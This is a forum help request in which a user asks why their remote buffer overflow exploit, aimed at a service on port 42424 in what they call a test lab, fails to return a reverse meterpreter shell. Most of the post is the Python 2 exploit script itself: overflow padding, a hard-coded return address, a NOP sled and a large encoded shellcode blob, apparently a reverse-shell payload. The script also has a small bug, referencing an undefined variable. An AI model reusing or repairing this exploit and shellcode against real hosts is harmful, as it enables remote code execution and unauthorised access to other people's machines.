Jump to content

Can someone please help me with my BOF code

confuscious1080

By confuscious1080
in Applications & Coding

 Share

Recommended Posts

confuscious1080 Newbie

confuscious1080

Posted
Posted

Hi I am attempting to exploit a remote buffer overflow as part of a test lab environment. 

The exploit works fine in a Windows 7 test VM and i can get a reverse meterpreter to my Kali Linux VM with ASLR turned off on the Windows VM.

However when I attempt this in the test environment against the machine that I know is running the application on port 42424 I do not get the reverses shell now i have tried this with both x86 and x64 shellcode, if i test locally on the Kali machine i can crash the application but again also do not get a shell my exploit code is below 

#!/usr/bin/env python2
import socket

ServiceManagerIP = "127.0.0.1"
ServiceManagerPort = 42424

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ServiceManagerIP, ServiceManagerPort))


payload = "\xc3"*146    #Junk Bytes
#77E9F7DF

payload += "\xDF\xF7\xE9\x77" + "\x90" *16

#Shellcode to be executed by application

payload += ("\xdb\xca\xd9\x74\x24\xf4\xb8\x0b\x9d\x83\x98\x5f\x2b\xc9\xb1"
"\x52\x83\xc7\x04\x31\x47\x13\x03\x4c\x8e\x61\x6d\xae\x58\xe7"
"\x8e\x4e\x99\x88\x07\xab\xa8\x88\x7c\xb8\x9b\x38\xf6\xec\x17"
"\xb2\x5a\x04\xa3\xb6\x72\x2b\x04\x7c\xa5\x02\x95\x2d\x95\x05"
"\x15\x2c\xca\xe5\x24\xff\x1f\xe4\x61\xe2\xd2\xb4\x3a\x68\x40"
"\x28\x4e\x24\x59\xc3\x1c\xa8\xd9\x30\xd4\xcb\xc8\xe7\x6e\x92"
"\xca\x06\xa2\xae\x42\x10\xa7\x8b\x1d\xab\x13\x67\x9c\x7d\x6a"
"\x88\x33\x40\x42\x7b\x4d\x85\x65\x64\x38\xff\x95\x19\x3b\xc4"
"\xe4\xc5\xce\xde\x4f\x8d\x69\x3a\x71\x42\xef\xc9\x7d\x2f\x7b"
"\x95\x61\xae\xa8\xae\x9e\x3b\x4f\x60\x17\x7f\x74\xa4\x73\xdb"
"\x15\xfd\xd9\x8a\x2a\x1d\x82\x73\x8f\x56\x2f\x67\xa2\x35\x38"
"\x44\x8f\xc5\xb8\xc2\x98\xb6\x8a\x4d\x33\x50\xa7\x06\x9d\xa7"
"\xc8\x3c\x59\x37\x37\xbf\x9a\x1e\xfc\xeb\xca\x08\xd5\x93\x80"
"\xc8\xda\x41\x06\x98\x74\x3a\xe7\x48\x35\xea\x8f\x82\xba\xd5"
"\xb0\xad\x10\x7e\x5a\x54\xf3\x41\x33\x39\x82\x2a\x46\xc5\x9a"
"\xcb\xcf\x23\xc8\x1b\x86\xfc\x65\x85\x83\x76\x17\x4a\x1e\xf3"
"\x17\xc0\xad\x04\xd9\x21\xdb\x16\x8e\xc1\x96\x44\x19\xdd\x0c"
"\xe0\xc5\x4c\xcb\xf0\x80\x6c\x44\xa7\xc5\x43\x9d\x2d\xf8\xfa"
"\x37\x53\x01\x9a\x70\xd7\xde\x5f\x7e\xd6\x93\xe4\xa4\xc8\x6d"
"\xe4\xe0\xbc\x21\xb3\xbe\x6a\x84\x6d\x71\xc4\x5e\xc1\xdb\x80"
"\x27\x29\xdc\xd6\x27\x64\xaa\x36\x99\xd1\xeb\x49\x16\xb6\xfb"
"\x32\x4a\x26\x03\xe9\xce\x56\x4e\xb3\x67\xff\x17\x26\x3a\x62"
"\xa8\x9d\x79\x9b\x2b\x17\x02\x58\x33\x52\x07\x24\xf3\x8f\x75"
"\x35\x96\xaf\x2a\x36\xb3")

s.send(payload+"\r\n")
data = s.recv(len(msg))
s.recv(1024)
s.close()
print data

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...